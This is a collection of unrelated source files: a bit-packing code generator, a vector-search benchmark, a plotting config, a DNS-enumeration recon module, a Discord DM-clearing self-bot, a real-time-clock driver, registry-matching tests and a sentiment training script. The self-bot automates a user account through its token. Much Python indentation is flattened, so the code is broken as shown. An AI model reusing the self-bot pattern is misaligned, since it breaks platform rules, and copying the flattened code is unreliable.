arr[51] += arr[50];
arr[52] += arr[51];
arr[53] += arr[52];
arr[54] += arr[53];
arr[55] += arr[54];
arr[56] += arr[55];
arr[57] += arr[56];
arr[58] += arr[57];
arr[59] += arr[58];
arr[60] += arr[59];
arr[61] += arr[60];
arr[62] += arr[61];
arr[63] += arr[62];
}
private static void readLELongs(DataInput in, long[] dst, int offset, int length)
throws IOException {
in.readLongs(dst, offset, length);
for (int i = 0; i < length; ++i) {
dst[offset + i] = Long.reverseBytes(dst[offset + i]);
}
}
private final long[] tmp = new long[BLOCK_SIZE / 2];
/** Encode 128 integers from {@code longs} into {@code out}. */
void encode(long[] longs, int bitsPerValue, DataOutput out) throws IOException {
final int nextPrimitive;
final int numLongs;
if (bitsPerValue <= 8) {
nextPrimitive = 8;
numLongs = BLOCK_SIZE / 8;
collapse8(longs);
} else if (bitsPerValue <= 16) {
nextPrimitive = 16;
numLongs = BLOCK_SIZE / 4;
collapse16(longs);
} else {
nextPrimitive = 32;
numLongs = BLOCK_SIZE / 2;
collapse32(longs);
}
final int numLongsPerShift = bitsPerValue * 2;
int idx = 0;
int shift = nextPrimitive - bitsPerValue;
for (int i = 0; i < numLongsPerShift; ++i) {
tmp[i] = longs[idx++] << shift;
}
for (shift = shift - bitsPerValue; shift >= 0; shift -= bitsPerValue) {
for (int i = 0; i < numLongsPerShift; ++i) {
tmp[i] |= longs[idx++] << shift;
}
}
final int remainingBitsPerLong = shift + bitsPerValue;
final long maskRemainingBitsPerLong;
if (nextPrimitive == 8) {
maskRemainingBitsPerLong = MASKS8[remainingBitsPerLong];
} else if (nextPrimitive == 16) {
maskRemainingBitsPerLong = MASKS16[remainingBitsPerLong];
} else {
maskRemainingBitsPerLong = MASKS32[remainingBitsPerLong];
}
int tmpIdx = 0;
int remainingBitsPerValue = bitsPerValue;
while (idx < numLongs) {
if (remainingBitsPerValue >= remainingBitsPerLong) {
remainingBitsPerValue -= remainingBitsPerLong;
tmp[tmpIdx++] |= (longs[idx] >>> remainingBitsPerValue) & maskRemainingBitsPerLong;
if (remainingBitsPerValue == 0) {
idx++;
remainingBitsPerValue = bitsPerValue;
}
} else {
final long mask1, mask2;
if (nextPrimitive == 8) {
mask1 = MASKS8[remainingBitsPerValue];
mask2 = MASKS8[remainingBitsPerLong - remainingBitsPerValue];
} else if (nextPrimitive == 16) {
mask1 = MASKS16[remainingBitsPerValue];
mask2 = MASKS16[remainingBitsPerLong - remainingBitsPerValue];
} else {
mask1 = MASKS32[remainingBitsPerValue];
mask2 = MASKS32[remainingBitsPerLong - remainingBitsPerValue];
}
tmp[tmpIdx] |= (longs[idx++] & mask1) << (remainingBitsPerLong - remainingBitsPerValue);
remainingBitsPerValue = bitsPerValue - remainingBitsPerLong + remainingBitsPerValue;
tmp[tmpIdx++] |= (longs[idx] >>> remainingBitsPerValue) & mask2;
}
}
for (int i = 0; i < numLongsPerShift; ++i) {
// Java longs are big endian and we want to read little endian longs, so we need to reverse
// bytes
long l = Long.reverseBytes(tmp[i]);
out.writeLong(l);
}
}
/** Number of bytes required to encode 128 integers of {@code bitsPerValue} bits per value. */
int numBytes(int bitsPerValue) throws IOException {
return bitsPerValue << (BLOCK_SIZE_LOG2 - 3);
}
private static void decodeSlow(int bitsPerValue, DataInput in, long[] tmp, long[] longs)
throws IOException {
final int numLongs = bitsPerValue << 1;
readLELongs(in, tmp, 0, numLongs);
final long mask = MASKS32[bitsPerValue];
int longsIdx = 0;
int shift = 32 - bitsPerValue;
for (; shift >= 0; shift -= bitsPerValue) {
shiftLongs(tmp, numLongs, longs, longsIdx, shift, mask);
longsIdx += numLongs;
}
final int remainingBitsPerLong = shift + bitsPerValue;
final long mask32RemainingBitsPerLong = MASKS32[remainingBitsPerLong];
int tmpIdx = 0;
int remainingBits = remainingBitsPerLong;
for (; longsIdx < BLOCK_SIZE / 2; ++longsIdx) {
int b = bitsPerValue - remainingBits;
long l = (tmp[tmpIdx++] & MASKS32[remainingBits]) << b;
while (b >= remainingBitsPerLong) {
b -= remainingBitsPerLong;
l |= (tmp[tmpIdx++] & mask32RemainingBitsPerLong) << b;
}
if (b > 0) {
l |= (tmp[tmpIdx] >>> (remainingBitsPerLong - b)) & MASKS32[b];
remainingBits = remainingBitsPerLong - b;
} else {
remainingBits = remainingBitsPerLong;
}
longs[longsIdx] = l;
}
}
/**
* The pattern that this shiftLongs method applies is recognized by the C2 compiler, which
* generates SIMD instructions for it in order to shift multiple longs at once.
*/
private static void shiftLongs(long[] a, int count, long[] b, int bi, int shift, long mask) {
for (int i = 0; i < count; ++i) {
b[bi + i] = (a[i] >>> shift) & mask;
}
}
"""
def writeRemainderWithSIMDOptimize(bpv, next_primitive, remaining_bits_per_long, o, num_values, f):
iteration = 1
  num_longs = bpv * num_values // remaining_bits_per_long
  while num_longs % 2 == 0 and num_values % 2 == 0:
    num_longs //= 2
    num_values //= 2
iteration *= 2
f.write(' shiftLongs(tmp, %d, tmp, 0, 0, MASK%d_%d);\n' % (iteration * num_longs, next_primitive, remaining_bits_per_long))
f.write(' for (int iter = 0, tmpIdx = 0, longsIdx = %d; iter < %d; ++iter, tmpIdx += %d, longsIdx += %d) {\n' %(o, iteration, num_longs, num_values))
tmp_idx = 0
b = bpv
b -= remaining_bits_per_long
f.write(' long l0 = tmp[tmpIdx + %d] << %d;\n' %(tmp_idx, b))
tmp_idx += 1
while b >= remaining_bits_per_long:
b -= remaining_bits_per_long
f.write(' l0 |= tmp[tmpIdx + %d] << %d;\n' %(tmp_idx, b))
tmp_idx += 1
f.write(' longs[longsIdx + 0] = l0;\n')
f.write(' }\n')
def writeRemainder(bpv, next_primitive, remaining_bits_per_long, o, num_values, f):
iteration = 1
  num_longs = bpv * num_values // remaining_bits_per_long
  while num_longs % 2 == 0 and num_values % 2 == 0:
    num_longs //= 2
    num_values //= 2
iteration *= 2
f.write(' for (int iter = 0, tmpIdx = 0, longsIdx = %d; iter < %d; ++iter, tmpIdx += %d, longsIdx += %d) {\n' %(o, iteration, num_longs, num_values))
i = 0
remaining_bits = 0
tmp_idx = 0
for i in range(num_values):
b = bpv
if remaining_bits == 0:
b -= remaining_bits_per_long
f.write(' long l%d = (tmp[tmpIdx + %d] & MASK%d_%d) << %d;\n' %(i, tmp_idx, next_primitive, remaining_bits_per_long, b))
else:
b -= remaining_bits
f.write(' long l%d = (tmp[tmpIdx + %d] & MASK%d_%d) << %d;\n' %(i, tmp_idx, next_primitive, remaining_bits, b))
tmp_idx += 1
while b >= remaining_bits_per_long:
b -= remaining_bits_per_long
f.write(' l%d |= (tmp[tmpIdx + %d] & MASK%d_%d) << %d;\n' %(i, tmp_idx, next_primitive, remaining_bits_per_long, b))
tmp_idx += 1
if b > 0:
f.write(' l%d |= (tmp[tmpIdx + %d] >>> %d) & MASK%d_%d;\n' %(i, tmp_idx, remaining_bits_per_long-b, next_primitive, b))
remaining_bits = remaining_bits_per_long-b
f.write(' longs[longsIdx + %d] = l%d;\n' %(i, i))
f.write(' }\n')
def writeDecode(bpv, f):
next_primitive = 32
if bpv <= 8:
next_primitive = 8
elif bpv <= 16:
next_primitive = 16
f.write(' private static void decode%d(DataInput in, long[] tmp, long[] longs) throws IOException {\n' %bpv)
  num_values_per_long = 64 // next_primitive
if bpv == next_primitive:
f.write(' readLELongs(in, longs, 0, %d);\n' %(bpv*2))
else:
f.write(' readLELongs(in, tmp, 0, %d);\n' %(bpv*2))
shift = next_primitive - bpv
o = 0
while shift >= 0:
f.write(' shiftLongs(tmp, %d, longs, %d, %d, MASK%d_%d);\n' %(bpv*2, o, shift, next_primitive, bpv))
o += bpv*2
shift -= bpv
if shift + bpv > 0:
if bpv % (next_primitive % bpv) == 0:
      writeRemainderWithSIMDOptimize(bpv, next_primitive, shift + bpv, o, 128//num_values_per_long - o, f)
    else:
      writeRemainder(bpv, next_primitive, shift + bpv, o, 128//num_values_per_long - o, f)
f.write(' }\n')
f.write('\n')
if __name__ == '__main__':
f = open(OUTPUT_FILE, 'w')
f.write(HEADER)
for primitive_size in PRIMITIVE_SIZE:
f.write(' private static final long[] MASKS%d = new long[%d];\n' %(primitive_size, primitive_size))
f.write('\n')
f.write(' static {\n')
for primitive_size in PRIMITIVE_SIZE:
f.write(' for (int i = 0; i < %d; ++i) {\n' %primitive_size)
f.write(' MASKS%d[i] = mask%d(i);\n' %(primitive_size, primitive_size))
f.write(' }\n')
f.write(' }\n')
f.write(' // mark values in array as final longs to avoid the cost of reading array, arrays should only be\n')
f.write(' // used when the idx is a variable\n')
for primitive_size in PRIMITIVE_SIZE:
for bpv in range(1, min(MAX_SPECIALIZED_BITS_PER_VALUE + 1, primitive_size)):
if bpv * 2 != primitive_size or primitive_size == 8:
f.write(' private static final long MASK%d_%d = MASKS%d[%d];\n' %(primitive_size, bpv, primitive_size, bpv))
f.write("""
/** Decode 128 integers into {@code longs}. */
void decode(int bitsPerValue, DataInput in, long[] longs) throws IOException {
switch (bitsPerValue) {
""")
for bpv in range(1, MAX_SPECIALIZED_BITS_PER_VALUE+1):
next_primitive = 32
if bpv <= 8:
next_primitive = 8
elif bpv <= 16:
next_primitive = 16
f.write(' case %d:\n' %bpv)
f.write(' decode%d(in, tmp, longs);\n' %bpv)
f.write(' expand%d(longs);\n' %next_primitive)
f.write(' break;\n')
f.write(' default:\n')
f.write(' decodeSlow(bitsPerValue, in, tmp, longs);\n')
f.write(' expand32(longs);\n')
f.write(' break;\n')
f.write(' }\n')
f.write(' }\n')
f.write("""
/** Delta-decode 128 integers into {@code longs}. */
void decodeAndPrefixSum(int bitsPerValue, DataInput in, long base, long[] longs)
throws IOException {
switch (bitsPerValue) {
""")
for bpv in range(1, MAX_SPECIALIZED_BITS_PER_VALUE+1):
next_primitive = 32
if bpv <= 8:
next_primitive = 8
elif bpv <= 16:
next_primitive = 16
f.write(' case %d:\n' %bpv)
f.write(' decode%d(in, tmp, longs);\n' %bpv)
f.write(' prefixSum%d(longs, base);\n' %next_primitive)
f.write(' break;\n')
f.write(' default:\n')
f.write(' decodeSlow(bitsPerValue, in, tmp, longs);\n')
f.write(' prefixSum32(longs, base);\n')
f.write(' break;\n')
f.write(' }\n')
f.write(' }\n')
f.write('\n')
for i in range(1, MAX_SPECIALIZED_BITS_PER_VALUE+1):
writeDecode(i, f)
f.write('}\n')
|
examples/benchmark/run_sift1b.py | abcp4/rii | 120 | 12748464 | <reponame>abcp4/rii
import numpy as np
import pathlib
import nanopq
import pickle
import time
import more_itertools
import texmex_python
import util
### If you'd like to debug, please uninstall rii and uncomment the following lines
#import sys
#sys.path.append('../../')
import rii
def run(engine, L, Xq, gt, r):
"""
Given a searcher, run the search. Return the runtime and the accuracy
Args:
engine (rii.Rii): Rii search engine
L (int): The number of candidates for search
Xq (np.array): Query vectors. shape=(Nq, D). dtype=np.float32
gt (np.array): Groundtruth. shape=(Nq, ANY). dtype=np.int32
r (int): Top R
Returns:
(float, float): Duration [sec/query] and recall@r over the queries
"""
assert Xq.ndim == 2
assert Xq.dtype == np.float32
Nq = Xq.shape[0]
I = np.zeros((Nq, r), dtype=int)
t0 = time.time()
for i, q in enumerate(Xq):
I[i], _ = engine.query(q=q, topk=r, L=L)
t1 = time.time()
duration = (t1 - t0) / Nq # sec/query
recall = util.recall_at_r(I, gt, r)
return duration, recall
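# util.recall_at_r is not shown in this file; the (unused) sketch below illustrates
# what it is assumed to compute: Recall@R, i.e. the fraction of queries whose top-R
# result list contains the ground-truth nearest neighbour. The real helper may differ.
def _recall_at_r_sketch(I, gt, r):
    hits = sum(1 for i in range(I.shape[0]) if gt[i, 0] in I[i, :r])
    return hits / I.shape[0]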
# Setup paths
p = pathlib.Path('.')
path_train = p / "data/bigann_learn.bvecs"
path_base = p / "data/bigann_base.bvecs"
path_query = p / "data/bigann_query.bvecs"
path_gt = p / "data/gnd/idx_1000M.ivecs"
# Read queries and groundtruth
Xq = texmex_python.reader.read_bvec(path_query.open("rb")).astype(np.float32)
gt = util.ivecs_read(str(path_gt))
# Read the top Nt vectors for training
print("Start to read training vectors")
Xt = []
Nt = 10000000 # Use top 10M vectors for training
with path_train.open("rb") as f:
for vec in texmex_python.reader.read_bvec_iter(f):
Xt.append(vec)
if len(Xt) == Nt:
break
Xt = np.array(Xt, dtype=np.float32)
print("Xt.shape: {}, Xt.dtype: {}".format(Xt.shape, Xt.dtype))
# Train a PQ codec and save it
M = 8 # The number of subspace.
path_codec = p / 'cache/codec_m{}.pkl'.format(M)
if not path_codec.exists():
print("Start to train a codec")
codec = nanopq.PQ(M=M, verbose=True).fit(vecs=Xt)
pickle.dump(codec, path_codec.open("wb"))
print("Dump the codec in {}".format(path_codec))
else:
print("Read a codec from cache: {}".format(path_codec))
codec = pickle.load(path_codec.open("rb"))
# Construct a search engine
path_engine = p / 'cache/engine_m{}.pkl'.format(M)
if not path_engine.exists():
print("Start to construct a Rii engine")
e = rii.Rii(fine_quantizer=codec)
batch_size = 10000000
with path_base.open("rb") as f:
for n, batch in enumerate(more_itertools.chunked(texmex_python.reader.read_bvec_iter(f), batch_size)):
print("batch: {} / {}".format(n, int(1000000000 / batch_size)))
e.add(vecs=np.array(batch, dtype=np.float32))
e.reconfigure()
pickle.dump(e, path_engine.open("wb"))
print("Dump the engine in {}".format(path_engine))
else:
print("Read an engine from cache: {}".format(path_engine))
e = pickle.load(path_engine.open("rb"))
e.print_params()
# Run search
r = 1 # Recall@r
w = 1 # The parameter for search candidates. L = L0 * w = N / nlist * w. The default (fastest) setting is w=1
duration, recall = run(engine=e, L=e.L0 * w, Xq=Xq, gt=gt, r=r)
print("{} msec/query. Recall@{} = {}".format(duration * 1000, r, recall))
|
Trescope4Python/library/src/trescope/config/VectorField3DConfig.py | aaabbb2021/Trescope | 105 | 12748468 | from typing import List
from trescope.config import Config, AnchorType, AnchorCM
from trescope.core.Utils import toListIfNumpyOrTensorArray
class VectorField3DConfig(Config):
"""Config for :py:meth:`trescope.Output.plotVectorField3D`"""
def __init__(self):
super().__init__()
self.__sizeFactor: float = .5
self.__autoScaleByLocation = False
self.__colorScale = [[0, 0x88000000], [1, 0x88000000]]
self.__x: List[float] = []
self.__y: List[float] = []
self.__z: List[float] = []
self.__anchor: str = str(AnchorCM)
def sizeFactor(self, sizeFactor: float):
"""
Specify size factor .
:param sizeFactor: size factor , default .5
:return: self , for chain call
"""
self.__sizeFactor = sizeFactor
return self
def anchor(self, anchor: AnchorType):
"""
Specify anchor type .
:param anchor: anchor
:return: self , for chain call
"""
self.__anchor = str(anchor)
return self
def autoScaleByLocation(self, autoScale: bool):
"""
Specify auto scale or not .
:param autoScale: auto scale , default `False`
:return: self , for chain call
"""
self.__autoScaleByLocation = autoScale
return self
def locations(self, x: List[float], y: List[float], z: List[float]):
"""
Specify locations .
:param x: x
:param y: y
:param z: z
:return: self , for chain call
"""
self.__x, self.__y, self.__z = x, y, z
return self
def color(self, color: int):
"""
Specify color .
:param color: color
:return: self , for chain call
"""
self.__colorScale = [[0, color], [1, color]]
return self
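    # Minimal usage sketch (assumed from the setters above; the concrete coordinates
    # and the ARGB colour value are made up for illustration):
    #   config = (VectorField3DConfig()
    #             .locations(x=[0, 1], y=[0, 1], z=[0, 1])
    #             .sizeFactor(1.0)
    #             .color(0xFF00FF00)
    #             .autoScaleByLocation(True))
    # The chained style works because every setter returns `self`.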
def toDict(self):
return {
**super().toDict(),
'sizeFactor': self.__sizeFactor,
'autoScaleByLocation': self.__autoScaleByLocation,
'colorScale': self.__colorScale,
'locationX': toListIfNumpyOrTensorArray(self.__x),
'locationY': toListIfNumpyOrTensorArray(self.__y),
'locationZ': toListIfNumpyOrTensorArray(self.__z),
'anchor': self.__anchor
}
|
modules/dns.py | tomsec/FinalRecon | 1,391 | 12748482 | <reponame>tomsec/FinalRecon
#!/usr/bin/env python3
import os
import dnslib
R = '\033[31m' # red
G = '\033[32m' # green
C = '\033[36m' # cyan
W = '\033[0m' # white
Y = '\033[33m' # yellow
def dnsrec(domain, output, data):
result = {}
print('\n' + Y + '[!]' + Y + ' Starting DNS Enumeration...' + W + '\n')
types = ['A', 'AAAA', 'ANY', 'CAA', 'CNAME', 'MX', 'NS', 'TXT']
full_ans = []
for Type in types:
q = dnslib.DNSRecord.question(domain, Type)
		pkt = q.send('8.8.8.8', 53, tcp=False)
ans = dnslib.DNSRecord.parse(pkt)
ans = str(ans)
ans = ans.split('\n')
full_ans.extend(ans)
full_ans = set(full_ans)
dns_found = []
for entry in full_ans:
if entry.startswith(';') == False:
dns_found.append(entry)
else:
pass
if len(dns_found) != 0:
for entry in dns_found:
print(G + '[+]' + C + ' {}'.format(entry) + W)
if output != 'None':
result.setdefault('dns', []).append(entry)
else:
print(R + '[-]' + C + ' DNS Records Not Found!' + W)
if output != 'None':
result.setdefault('dns', ['DNS Records Not Found'])
dmarc_target = '_dmarc.' + domain
q = dnslib.DNSRecord.question(dmarc_target, 'TXT')
	pkt = q.send('8.8.8.8', 53, tcp=False)
dmarc_ans = dnslib.DNSRecord.parse(pkt)
dmarc_ans = str(dmarc_ans)
dmarc_ans = dmarc_ans.split('\n')
dmarc_found = []
for entry in dmarc_ans:
if entry.startswith('_dmarc') == True:
dmarc_found.append(entry)
else:
pass
if len(dmarc_found) != 0:
for entry in dmarc_found:
print(G + '[+]' + C + ' {}'.format(entry) + W)
if output != 'None':
result.setdefault('dmarc', []).append(entry)
else:
print('\n' + R + '[-]' + C + ' DMARC Record Not Found!' + W)
if output != 'None':
result.setdefault('dmarc', ['DMARC Record Not Found!'])
if output != 'None':
dns_export(output, data, result)
def dns_export(output, data, result):
data['module-DNS Enumeration'] = result |
Additional_File/16_ClearDM/cleardm.py | nomrsavage/Discord-All-Tools-In-One | 197 | 12748493 | import os, os.path, discord
from discord.ext import commands
from colorama import Fore
os.system('cls' if os.name == 'nt' else 'clear')
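# NOTE: the colour shortcuts y, w, b and the cleardmtitle()/main() helpers used below
# are not defined in this snippet; they are presumably provided by the surrounding
# toolkit. A reasonable guess for the colours, given the colorama import, would be:
#   y, w, b = Fore.YELLOW, Fore.WHITE, Fore.BLUE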
cleardmtitle()
print(f"""{y}[{w}+{y}]{w} Enter your token""")
token = input(f"""{y}[{b}#{y}]{w} Token: """)
print(f"""\n{y}[{b}#{y}]{w} Write "!clear" in one of your DMs to delete your messages""")
global bot
bot = commands.Bot(command_prefix="!", self_bot=True)
bot.remove_command("help")
@bot.command()
async def clear(ctx, limit: int=None):
passed = 0
failed = 0
async for msg in ctx.message.channel.history(limit=limit):
if msg.author.id == bot.user.id:
try:
await msg.delete()
passed += 1
except:
failed += 1
print(f"\n{y}[{w}+{y}]{w} Removed {passed} messages with {failed} fails")
input(f"""\n{y}[{b}#{y}]{w} Press ENTER to exit""")
main()
bot.run(token, bot=False) |
python/paddle/fluid/dygraph/parallel_helper.py | OuyangChao/Paddle | 17,085 | 12748530 | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from ..layers import collective
from ..framework import Parameter
__parallel_ctx__clz__ = None
def _is_data_parallel_mode():
global __parallel_ctx__clz__
return __parallel_ctx__clz__ is not None and int(
os.getenv("PADDLE_TRAINERS_NUM", "1")) > 1
def _is_parallel_ctx_initialized():
global __parallel_ctx__clz__
return __parallel_ctx__clz__ is not None
def _set_parallel_ctx(nccl_parallel_context):
global __parallel_ctx__clz__
assert __parallel_ctx__clz__ is None, \
"ParallelContext can only be initialized once."
__parallel_ctx__clz__ = nccl_parallel_context
def _init_parallel_ctx():
global __parallel_ctx__clz__
assert __parallel_ctx__clz__ is not None, \
"ParallelContext should be initialized."
__parallel_ctx__clz__.init()
def _broadcast_parameters(parameters):
for param in parameters:
# In model parallel, some parameters are split into multiple devices,
# so we could not broadcast these parameters.
if param.is_distributed: continue
if isinstance(param, Parameter) and param.trainable:
collective._broadcast(param, 0, sync_mode=True)
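# Typical call order during dygraph data-parallel setup (sketch only; the actual
# wiring lives in the dygraph parallel module and may differ):
#   _set_parallel_ctx(nccl_ctx) # register the NCCL context exactly once
#   _init_parallel_ctx() # initialise the communicators
#   _broadcast_parameters(layer.parameters()) # sync initial weights from rank 0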
|
misc/DS1307/DS1307.py | garymeg/mpy-lib | 116 | 12748541 | '''
DS1307 RTC driver
Author: shaoziyang
Date: 2018.3
http://www.micropython.org.cn
'''
from micropython import const
DS1307_I2C_ADDRESS = const(104)
DS1307_REG_SECOND = const(0)
DS1307_REG_MINUTE = const(1)
DS1307_REG_HOUR = const(2)
DS1307_REG_WEEKDAY = const(3)
DS1307_REG_DAY = const(4)
DS1307_REG_MONTH = const(5)
DS1307_REG_YEAR = const(6)
DS1307_REG_CTRL = const(7)
DS1307_REG_RAM = const(8)
class DS1307():
def __init__(self, i2c):
self.i2c = i2c
self.DT = [0] * 8
self.buf = bytearray(8)
self.tb = bytearray(1)
self.rb = bytearray(1)
self.start()
# set reg
def setReg(self, reg, dat):
self.tb[0] = dat
self.i2c.writeto_mem(DS1307_I2C_ADDRESS, reg, self.tb)
# get reg
def getReg(self, reg):
self.i2c.readfrom_mem_into(DS1307_I2C_ADDRESS, reg, self.rb)
return self.rb[0]
def start(self):
t = self.getReg(DS1307_REG_SECOND)
self.setReg(DS1307_REG_SECOND, t&0x7F)
def stop(self):
t = self.getReg(DS1307_REG_SECOND)
self.setReg(DS1307_REG_SECOND, t|0x80)
def DecToHex(self, dat):
return (dat//10) * 16 + (dat%10)
def HexToDec(self, dat):
return (dat//16) * 10 + (dat%16)
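    # The two helpers above convert between plain decimal and the BCD (binary-coded
    # decimal) layout used by the DS1307 registers, e.g. DecToHex(25) -> 0x25 (37)
    # and HexToDec(0x25) -> 25.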
def datetime(self, DT=None):
if DT == None:
self.i2c.readfrom_mem_into(DS1307_I2C_ADDRESS, DS1307_REG_SECOND, self.buf)
self.DT[0] = self.HexToDec(self.buf[6]) + 2000
self.DT[1] = self.HexToDec(self.buf[5])
self.DT[2] = self.HexToDec(self.buf[4])
self.DT[3] = self.HexToDec(self.buf[3])
self.DT[4] = self.HexToDec(self.buf[2])
self.DT[5] = self.HexToDec(self.buf[1])
self.DT[6] = self.HexToDec(self.buf[0])
self.DT[7] = 0
return self.DT
else:
self.buf[0] = 0
self.buf[1] = self.DecToHex(DT[6]%60) # second
self.buf[2] = self.DecToHex(DT[5]%60) # minute
self.buf[3] = self.DecToHex(DT[4]%24) # hour
self.buf[4] = self.DecToHex(DT[3]%8) # week day
self.buf[5] = self.DecToHex(DT[2]%32) # date
self.buf[6] = self.DecToHex(DT[1]%13) # month
self.buf[7] = self.DecToHex(DT[0]%100) # year
self.i2c.writeto(DS1307_I2C_ADDRESS, self.buf)
def year(self, year = None):
if year == None:
return self.HexToDec(self.getReg(DS1307_REG_YEAR)) + 2000
else:
self.setReg(DS1307_REG_YEAR, self.DecToHex(year%100))
def month(self, month = None):
if month == None:
return self.HexToDec(self.getReg(DS1307_REG_MONTH))
else:
self.setReg(DS1307_REG_MONTH, self.DecToHex(month%13))
def day(self, day = None):
if day == None:
return self.HexToDec(self.getReg(DS1307_REG_DAY))
else:
self.setReg(DS1307_REG_DAY, self.DecToHex(day%32))
def weekday(self, weekday = None):
if weekday == None:
return self.HexToDec(self.getReg(DS1307_REG_WEEKDAY))
else:
self.setReg(DS1307_REG_WEEKDAY, self.DecToHex(weekday%8))
def hour(self, hour = None):
if hour == None:
return self.HexToDec(self.getReg(DS1307_REG_HOUR))
else:
self.setReg(DS1307_REG_HOUR, self.DecToHex(hour%24))
def minute(self, minute = None):
if minute == None:
return self.HexToDec(self.getReg(DS1307_REG_MINUTE))
else:
self.setReg(DS1307_REG_MINUTE, self.DecToHex(minute%60))
def second(self, second = None):
if second == None:
return self.HexToDec(self.getReg(DS1307_REG_SECOND))
else:
self.setReg(DS1307_REG_SECOND, self.DecToHex(second%60))
def ram(self, reg, dat = None):
if dat == None:
return self.getReg(DS1307_REG_RAM + (reg%56))
else:
self.setReg(DS1307_REG_RAM + (reg%56), dat)
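# Usage sketch (MicroPython; the bus number and pin assignments below are placeholders
# that depend on the board in use):
#   from machine import I2C, Pin
#   i2c = I2C(1, scl=Pin(22), sda=Pin(21), freq=100000)
#   rtc = DS1307(i2c)
#   rtc.datetime([2018, 3, 1, 4, 12, 0, 0, 0]) # [year, month, day, weekday, hour, minute, second, 0]
#   print(rtc.datetime())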
|
modelci/experimental/finetuner/__init__.py | FerdinandZhong/ML-Model-CI | 170 | 12748555 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Author: <NAME>
Email: <EMAIL>
Date: 1/12/2021
"""
from pathlib import Path
OUTPUT_DIR = Path.home() / 'tmp'
OUTPUT_DIR.mkdir(parents=True, exist_ok=True)
|
openshift/installer/vendored/openshift-ansible-3.11.28-1/roles/lib_utils/test/test_sanity_checks.py | fahlmant/openshift-tools | 164 | 12748567 | <reponame>fahlmant/openshift-tools<gh_stars>100-1000
'''
Unit tests for wildcard
'''
import os
import sys
MODULE_PATH = os.path.realpath(os.path.join(__file__, os.pardir, os.pardir, 'action_plugins'))
sys.path.insert(0, MODULE_PATH)
# pylint: disable=import-error,wrong-import-position,missing-docstring
from sanity_checks import is_registry_match # noqa: E402
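# The assertions below pin down the pattern semantics expected from is_registry_match:
# "*" matches any registry, a bare hostname like "docker.io" matches that host with or
# without a port, "*.example.com" matches subdomains only, and "registry:80" matches
# the host "registry" regardless of the port used. See the concrete cases below.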
def test_is_registry_match():
'''
Test for is_registry_match
'''
pat_allowall = "*"
pat_docker = "docker.io"
pat_subdomain = "*.example.com"
pat_matchport = "registry:80"
assert is_registry_match("docker.io/repo/my", pat_allowall)
assert is_registry_match("example.com:4000/repo/my", pat_allowall)
assert is_registry_match("192.168.127.12:4000/a/b/c", pat_allowall)
assert is_registry_match("https://registry.com", pat_allowall)
assert is_registry_match("example.com/openshift3/ose-${component}:${version}", pat_allowall)
assert is_registry_match("docker.io/repo/my", pat_docker)
assert is_registry_match("docker.io:443/repo/my", pat_docker)
assert is_registry_match("docker.io/openshift3/ose-${component}:${version}", pat_allowall)
assert not is_registry_match("example.com:4000/repo/my", pat_docker)
assert not is_registry_match("index.docker.io/a/b/c", pat_docker)
assert not is_registry_match("https://registry.com", pat_docker)
assert not is_registry_match("example.com/openshift3/ose-${component}:${version}", pat_docker)
assert is_registry_match("apps.foo.example.com/prefix", pat_subdomain)
assert is_registry_match("sub.example.com:80", pat_subdomain)
assert not is_registry_match("https://example.com:443/prefix", pat_subdomain)
assert not is_registry_match("docker.io/library/my", pat_subdomain)
assert not is_registry_match("https://hello.example.bar", pat_subdomain)
assert is_registry_match("registry:80/prefix", pat_matchport)
assert is_registry_match("registry/myapp", pat_matchport)
assert is_registry_match("registry:443/myap", pat_matchport)
assert not is_registry_match("https://example.com:443/prefix", pat_matchport)
assert not is_registry_match("docker.io/library/my", pat_matchport)
assert not is_registry_match("https://hello.registry/myapp", pat_matchport)
if __name__ == '__main__':
test_is_registry_match()
|
dalib/vision/__init__.py | xyzhu12/Transfer-Learning-Library | 109 | 12748569 | __all__ = ['datasets', 'models']
|
distributed training/tf-sentiment-script-mode/sentiment.py | merb92/amazon-sagemaker-keras-text-classification | 106 | 12748573 | <reponame>merb92/amazon-sagemaker-keras-text-classification
import argparse
import numpy as np
import os
import tensorflow as tf
from tensorflow.contrib.eager.python import tfe
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.layers import Embedding
from keras.layers import Conv1D, GlobalMaxPooling1D
tf.logging.set_verbosity(tf.logging.ERROR)
max_features = 20000
maxlen = 400
embedding_dims = 300
filters = 250
kernel_size = 3
hidden_dims = 250
def parse_args():
parser = argparse.ArgumentParser()
# hyperparameters sent by the client are passed as command-line arguments to the script
parser.add_argument('--epochs', type=int, default=1)
parser.add_argument('--batch_size', type=int, default=64)
# data directories
parser.add_argument('--train', type=str, default=os.environ.get('SM_CHANNEL_TRAIN'))
parser.add_argument('--test', type=str, default=os.environ.get('SM_CHANNEL_TEST'))
# model directory: we will use the default set by SageMaker, /opt/ml/model
parser.add_argument('--model_dir', type=str, default=os.environ.get('SM_MODEL_DIR'))
return parser.parse_known_args()
def get_train_data(train_dir):
x_train = np.load(os.path.join(train_dir, 'x_train.npy'))
y_train = np.load(os.path.join(train_dir, 'y_train.npy'))
print('x train', x_train.shape,'y train', y_train.shape)
return x_train, y_train
def get_test_data(test_dir):
x_test = np.load(os.path.join(test_dir, 'x_test.npy'))
y_test = np.load(os.path.join(test_dir, 'y_test.npy'))
print('x test', x_test.shape,'y test', y_test.shape)
return x_test, y_test
def get_model():
embedding_layer = tf.keras.layers.Embedding(max_features,
embedding_dims,
input_length=maxlen)
sequence_input = tf.keras.Input(shape=(maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
x = tf.keras.layers.Dropout(0.2)(embedded_sequences)
x = tf.keras.layers.Conv1D(filters, kernel_size, padding='valid', activation='relu', strides=1)(x)
x = tf.keras.layers.MaxPooling1D()(x)
x = tf.keras.layers.GlobalMaxPooling1D()(x)
x = tf.keras.layers.Dense(hidden_dims, activation='relu')(x)
x = tf.keras.layers.Dropout(0.2)(x)
preds = tf.keras.layers.Dense(1, activation='sigmoid')(x)
return tf.keras.Model(sequence_input, preds)
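# Architecture note: get_model() builds a small convolutional text classifier over the
# padded integer sequences loaded above (embedding -> dropout -> Conv1D -> pooling ->
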